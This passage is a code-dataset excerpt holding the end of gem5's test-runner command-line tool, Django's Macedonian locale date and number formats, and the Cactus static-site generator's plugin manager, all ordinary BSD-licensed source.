        systems. It provides an XML representation of test
        status. Similar to the text format, it includes detailed
        information about test failures. Since many JUnit parser make
        assume that test names look like Java packet strings, the
        JUnit formatter automatically to something the looks like a
        Java class path ('.'->'-', '/'->'.').

        The 'pickle' format stores the raw results in a format that
        can be reformatted using this command. It's typically used
        with the show command to merge multiple test results into one
        pickle file.""")

    _add_format_args(parser)
    parser.add_argument("result", type=argparse.FileType("rb"), nargs="*",
                        help="Pickled test results")
def _show(args):
    """Load pickled test suites from every result file and reformat them."""
    formatter = _create_formatter(args)
    suites = []
    for result_file in args.result:
        suites.extend(pickle.load(result_file))
    formatter.dump_suites(suites)
def _test_args(subparsers):
    # Register the 'test' sub-command, which inspects pickled results and
    # communicates the overall outcome through the process exit code.
    epilog = """
        Load one or more pickled test file and return an exit code
        corresponding to the test outcome. The following exit codes
        can be returned:
        0: All tests were successful or skipped.
        1: General fault in the script such as incorrect parameters or
           failing to parse a pickle file.
        2: At least one test failed to run. This is what the summary
        formatter usually shows as a 'FAILED'.
        3: All tests ran correctly, but at least one failed to
        verify its output. When displaying test output using the
        summary formatter, such a test would show up as 'CHANGED'.
        """

    cmd_parser = subparsers.add_parser(
        "test",
        help='Probe test results and set exit code',
        formatter_class=ParagraphHelpFormatter,
        epilog=epilog)

    _add_format_args(cmd_parser)

    cmd_parser.add_argument("result", nargs="*",
                            type=argparse.FileType("rb"),
                            help="Pickled test results")
def _test(args):
    """Exit with a status code describing the outcome of pickled test runs.

    Exit codes: 0 - every suite was successful (or skipped); 2 - at
    least one suite failed to run; 3 - every suite ran, but at least
    one produced changed output.
    """
    suites = []
    for result_file in args.result:
        suites.extend(pickle.load(result_file))

    if all(suites):
        sys.exit(0)
    if any(s.failed_run() for s in suites):
        sys.exit(2)
    if any(s.changed() for s in suites):
        sys.exit(3)

    # A suite was falsy but neither failed to run nor changed its
    # output -- that combination should be impossible.
    assert False, "Unexpected return status from test"
# Maps each sub-command name to a (handler, parser-setup) pair. The
# setup function registers the sub-command's arguments on the argparse
# subparsers object; the handler is called with the parsed arguments.
_commands = {
    "list" : (_list_tests, _list_tests_args),
    "run" : (_run_tests, _run_tests_args),
    "show" : (_show, _show_args),
    "test" : (_test, _test_args),
}
def main():
    """Script entry point: build the CLI, then run the selected sub-command."""
    parser = argparse.ArgumentParser(
        formatter_class=ParagraphHelpFormatter,
        description="""gem5 testing multi tool.""",
        epilog="""
        This tool provides an interface to gem5's test framework that
        doesn't depend on gem5's build system. It supports test
        listing, running, and output formatting.
        The list sub-command (e.g., "test.py list arm/quick") produces
        a list of tests tuples that can be used by the run command
        (e.g., "tests.py run gem5.opt
        quick/se/00.hello/arm/linux/simple-timing").
        The run command supports several output formats. One of them,
        pickle, contains the raw output from the tests and can be
        re-formatted using the show command (e.g., "tests.py show
        --format summary *.pickle"). Such pickle files are also
        generated by the build system when scons is used to run
        regressions.
        See the usage strings for the individual sub-commands for
        details.""")

    parser.add_argument("--verbose", action="store_true",
                        help="Produce more verbose output")

    subparsers = parser.add_subparsers(dest="command")
    # Give every sub-command a chance to register its argument parser.
    for _name, (_handler, register_args) in _commands.items():
        register_args(subparsers)

    args = parser.parse_args()
    # Look the handler up from the chosen command rather than relying on
    # the loop variables above.
    handler, _register_args = _commands[args.command]
    handler(args)
# Allow the module to be executed directly as a script.
if __name__ == "__main__":
    main()
| bsd-3-clause |
ticosax/django | django/conf/locale/mk/formats.py | 504 | 1742 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# Date/time, number and input formats for the Macedonian (mk) locale.
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'd F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'j.m.Y'
SHORT_DATETIME_FORMAT = 'j.m.Y H:i'
FIRST_DAY_OF_WEEK = 1  # Monday (Django counts Sunday as 0)
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
    '%d.%m.%Y', '%d.%m.%y', # '25.10.2006', '25.10.06'
    '%d. %m. %Y', '%d. %m. %y', # '25. 10. 2006', '25. 10. 06'
]
DATETIME_INPUT_FORMATS = [
    '%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
    '%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
    '%d.%m.%Y %H:%M', # '25.10.2006 14:30'
    '%d.%m.%Y', # '25.10.2006'
    '%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
    '%d.%m.%y %H:%M:%S.%f', # '25.10.06 14:30:59.000200'
    '%d.%m.%y %H:%M', # '25.10.06 14:30'
    '%d.%m.%y', # '25.10.06'
    '%d. %m. %Y %H:%M:%S', # '25. 10. 2006 14:30:59'
    '%d. %m. %Y %H:%M:%S.%f', # '25. 10. 2006 14:30:59.000200'
    '%d. %m. %Y %H:%M', # '25. 10. 2006 14:30'
    '%d. %m. %Y', # '25. 10. 2006'
    '%d. %m. %y %H:%M:%S', # '25. 10. 06 14:30:59'
    '%d. %m. %y %H:%M:%S.%f', # '25. 10. 06 14:30:59.000200'
    '%d. %m. %y %H:%M', # '25. 10. 06 14:30'
    '%d. %m. %y', # '25. 10. 06'
]
# Number formatting: e.g. 1.234.567,89
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
| bsd-3-clause |
eudicots/Cactus | cactus/plugin/manager.py | 5 | 2122 | #coding:utf-8
import functools
from cactus.utils.internal import getargspec
from cactus.plugin import defaults
class PluginManager(object):
    """Collects plugins from a set of loaders and dispatches events to them."""

    def __init__(self, site, loaders):
        self.site = site
        self.loaders = loaders
        self.reload()

        # Expose every standard plugin hook as a method on the manager;
        # each generated method broadcasts the call to all plugins.
        for hook in defaults.DEFAULTS:
            if not hasattr(self, hook):
                setattr(self, hook, functools.partial(self.call, hook))

    def reload(self):
        """Re-run every loader and rebuild the plugin list, sorted by ORDER."""
        collected = []
        for loader in self.loaders:
            collected.extend(loader.load())
        self.plugins = sorted(collected, key=lambda p: p.ORDER)

    def call(self, method, *args, **kwargs):
        """Invoke ``method`` on every plugin, in ORDER."""
        for plugin in self.plugins:
            getattr(plugin, method)(*args, **kwargs)

    def preBuildPage(self, site, page, context, data):
        """Dispatch the preBuildPage event to every plugin.

        Two calling conventions are supported:
        - the new one, which passes (page, context, data), and
        - the deprecated one, which additionally passes the site first
          (the site is now accessible via the page).
        Each plugin returns an updated (context, data) pair, which is
        threaded through to the next plugin.
        """
        for plugin in self.plugins:
            new_style = [page, context, data]
            deprecated_style = [site, page, context, data]
            by_arity = {len(deprecated_style): deprecated_style,
                        len(new_style): new_style}
            try:
                # Pick the convention matching the hook's arity; fall back
                # to the new convention for fancy *args/**kwargs signatures
                # we cannot inspect precisely.
                arg_count = len(getargspec(plugin.preBuildPage).args)
                call_args = by_arity.get(arg_count, new_style)
            except NotImplementedError:
                # Signature inspection unsupported: assume the new style.
                call_args = new_style

            # Call with the best convention we found; if that fails, let
            # the error escalate.
            context, data = plugin.preBuildPage(*call_args)

        return context, data
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.